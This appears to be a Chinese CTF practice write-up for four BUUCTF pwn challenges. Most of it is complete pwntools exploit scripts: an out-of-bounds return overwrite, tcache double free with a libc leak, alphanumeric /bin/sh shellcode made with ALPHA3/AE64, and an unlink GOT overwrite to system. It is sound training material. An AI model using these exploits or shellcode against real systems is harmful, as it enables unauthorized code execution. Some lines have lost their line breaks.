PWN-PRACTICE-BUUCTF-25

- wustctf2020_name_your_cat
- ciscn_2019_final_2
- mrctf2020_shellcode_revenge
- zctf2016_note2

wustctf2020_name_your_cat

通过数组越界覆写返回地址为后门shell的地址

from pwn import *
#io=process('./wustctf2020_name_your_cat')
io=remote('node4.buuoj.cn',28864)
elf=ELF('./wustctf2020_name_your_cat')
shell=0x080485CBio.sendlineafter('Name for which?\n>','1')
io.sendlineafter('Give your name plz: ','a')io.sendlineafter('Name for which?\n>','2')
io.sendlineafter('Give your name plz: ','a')io.sendlineafter('Name for which?\n>','3')
io.sendlineafter('Give your name plz: ','a')io.sendlineafter('Name for which?\n>','4')
io.sendlineafter('Give your name plz: ','a')io.sendlineafter('Name for which?\n>','7')
io.sendlineafter('Give your name plz: ',p32(shell))io.interactive()

ciscn_2019_final_2

参考：ciscn_2019_final_2

# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./ciscn_final_2")
io=remote("node4.buuoj.cn",29994)
elf=ELF("./ciscn_final_2")
libc=ELF("./libc-2.27-18-x64.so")def add(num_type,num):io.sendlineafter("which command?\n> ","1")io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type))io.sendlineafter("your inode number:",str(num))
def free(num_type):io.sendlineafter("which command?\n> ","2")io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type))
def show(num_type):io.sendlineafter("which command?\n> ","3")io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type))if num_type==1:io.recvuntil("your int type inode number :")elif num_type==2:io.recvuntil("your short type inode number :")return int(io.recvuntil("\n")[:-1])
def exit():io.sendlineafter("which command?\n> ","4")return io.recvall()#gdb.attach(io)
#pause()add(1,0x30)#0#pause()free(1) #0 out#pause()add(2,0x20)#1
add(2,0x20)#2
add(2,0x20)#3
add(2,0x20)#4#pause()free(2) #4 out#pause()add(1,0x30)#0, 因为上面的free(2)将bool置0，要构成double free需再add一次使bool置1#pause()free(2) #4 out, double free#pause()addr_chunk0_prev_size=show(2)-0xa0 #show(2)得到chunk4的fd，與chunk0的prev_size有着固定偏移0xa0
print("addr_chunk0_prev_size=="+hex(addr_chunk0_prev_size))
add(2,addr_chunk0_prev_size)#pause()add(2,addr_chunk0_prev_size)#pause()add(2,0x91) #chunk0的prev_size和size域的值均設為0x91#pause()for i in range(0,7): #绕过tcache机制free(1)add(2,0x20)
free(1) #再次free的时候进入unsorted bin#pause()main_arena=show(1)-96 #show(1)得到main_arena+96的值
print("main_arena=="+hex(main_arena))
libc_base=main_arena-0x10-libc.sym["__malloc_hook"]#main_arena與malloc_hook有着固定偏移0x10
print("libc_base=="+hex(libc_base))
stdin_fileno=libc_base+libc.sym["_IO_2_1_stdin_"]+0x70#加0x70，結構中的固定偏移
print("stdin_fileno=="+hex(stdin_fileno))#pause()add(1,stdin_fileno)#前面free(1)的時候，size為0x91，最後一個進入unsorted bin#這裡再次add的時候，因為只malloc(0x20)，切割了0x91大小的chunk#pause()add(1,0x30)#pause()free(1)#pause()add(2,0x20)#pause()free(1) #double free#pause()addr_chunk0_fd=show(1)-0x30 # 得到chunk0的fd#pause()add(1,addr_chunk0_fd)#pause()add(1,addr_chunk0_fd)#pause()add(1,111)#pause()add(1,666) #這裡將stdin_fileno處的值改寫為666#pause()print(exit())io.interactive()

mrctf2020_shellcode_revenge

程序对输入字符ascii码的范围进行判断，大小写+数字
然后有条call rax，可以想到是可见字符shellcode

.text:0000000000001246                 lea     rax, [rbp+buf]
.text:000000000000124D                 call    rax

参考：纯字符shellcode生成指南
alpha3方法：
用重定向方法输出的shellcode文件不太成功，提取数据自行创建一个二进制文件可行

vim shellcode.py
##################################################################################################################
from pwn import *
context.arch="amd64"
shellcode=asm(shellcraft.sh())
shellcode_bin=""
print(shellcode)
for c in shellcode:tmp=hex(c).replace("0x","").zfill(2)shellcode_bin+=tmp+" "
print(shellcode_bin)
##################################################################################################################
python3 shellcode.py

运行完shellcode.py的结果
shellcode-bin
然后用winhex创建一个空文件，将上面得到的十六进制填充入该空文件，保存名为shellcode
在这里插入图片描述
后面就是参考博客里的做法

python2 ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"
#打印出：
#Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

vim shellcode_exp.py
##################################################################################################################
# -*- coding:utf-8 -*-
from pwn import *
context.arch="amd64"
io=remote("node4.buuoj.cn",25235)
shellcode="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
io.recvuntil("Show me your magic!\n")
io.send(shellcode)#必须是send，不能是sendline
io.interactive()
##################################################################################################################
python3 shellcode_exp.py

AE64方法：

from pwn import *
from ae64 import AE64context.log_level = 'debug'
context.arch = 'amd64'#io = process('./example1')
io=remote('node4.buuoj.cn',25235)obj = AE64()
sc = obj.encode(asm(shellcraft.sh()),'rax')io.recvuntil("Show me your magic!\n")
#io.sendline(sc) 
io.send(sc) # mush send, not sendlineio.interactive()

zctf2016_note2

unlink
参考1：2016 ZCTF note2 题解
参考2：zctf2016_note2

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./note2")
io=remote("node4.buuoj.cn",29630)
elf=ELF("./note2")
libc=ELF("./libc-2.23-16-x64.so")def add(note_len,content):io.sendlineafter("option--->>\n","1")io.sendlineafter("Input the length of the note content:(less than 128)\n",str(note_len))io.sendlineafter("Input the note content:\n",content)
def show(index):io.sendlineafter("option--->>\n","2")io.sendlineafter("Input the id of the note:\n",str(index))
def edit(index,choice,content):io.sendlineafter("option--->>\n","3")io.sendlineafter("Input the id of the note:\n",str(index))io.sendlineafter("do you want to overwrite or append?[1.overwrite/2.append]\n",str(choice))io.sendlineafter("TheNewContents:",content)
def free(index):io.sendlineafter("option--->>\n","4")io.sendlineafter("Input the id of the note:\n",str(index))
def exit():io.sendlineafter("option--->>\n","5")ptr=0x0000000000602120
fd=ptr-0x18
bk=ptr-0x10io.sendlineafter("Input your name:\n","P1umH0")
io.sendlineafter("Input your address:\n","P1umH0")#gdb.attach(io)
#pause()add(0x80,p64(0)+p64(0x80+0x21)+p64(fd)+p64(bk))#0
add(0x00,"aaaa")#1
add(0x80,"bbbb")#2#pause()free(1)#pause()payload="a"*0x10+p64(0xa0)+p64(0x90)
add(0x00,payload)#3#pause()free(2) #unlink *ptr=ptr-0x18#pause()payload="a"*0x18+p64(elf.got["atoi"])
edit(0,1,payload)#pause()show(0)
io.recvuntil("Content is ")
atoi_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("atoi_addr=="+hex(atoi_addr))
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]
edit(0,1,p64(system))#pause()io.sendlineafter("option--->>\n","/bin/sh\x00")io.interactive()